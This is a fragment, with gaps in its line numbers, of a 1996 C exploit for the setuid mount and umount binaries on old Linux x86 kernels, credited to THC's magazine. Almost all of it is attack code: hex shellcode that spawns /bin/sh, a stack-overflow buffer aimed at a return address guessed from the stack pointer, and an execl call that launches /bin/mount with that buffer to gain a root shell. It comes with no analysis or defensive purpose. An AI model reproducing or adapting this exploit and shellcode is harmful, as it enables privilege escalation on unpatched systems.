2 * mount exploit for linux x86 < 2.0.10
3 * discovered by bloodmask&vio/couin
4 * coded by plasmoid/thc/deep for thc-magazine issue #3
5 * 12/12/96 - works also on umount
11 #define offset 30+lv_size+8*4
15 __asm__("movl %esp, %eax");
18 void main(int argc, char **argv)
21 "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
22 "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
23 "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
25 char buffer[lv_size + 4 * 8];
26 unsigned long *ptr2 = NULL;
30 for (i = 0; i < lv_size + 4 * 8; i++)
34 for (i = 0; i < lv_size - strlen(execshell); i++)
37 for (i = 0; i < strlen(execshell); i++)
38 *(ptr++) = execshell[i];
41 for (i = 1; i < 2; i++)
42 *(ptr2++) = get_sp() + offset;
44 printf("discovered by bloodmask&vio/couin\n"
45 "coded by plasmoid/thc/deep\n" "for thc-magazine issue #3\n");
47 (void) alarm((int) 0);
48 execl("/bin/mount", "mount", buffer, NULL);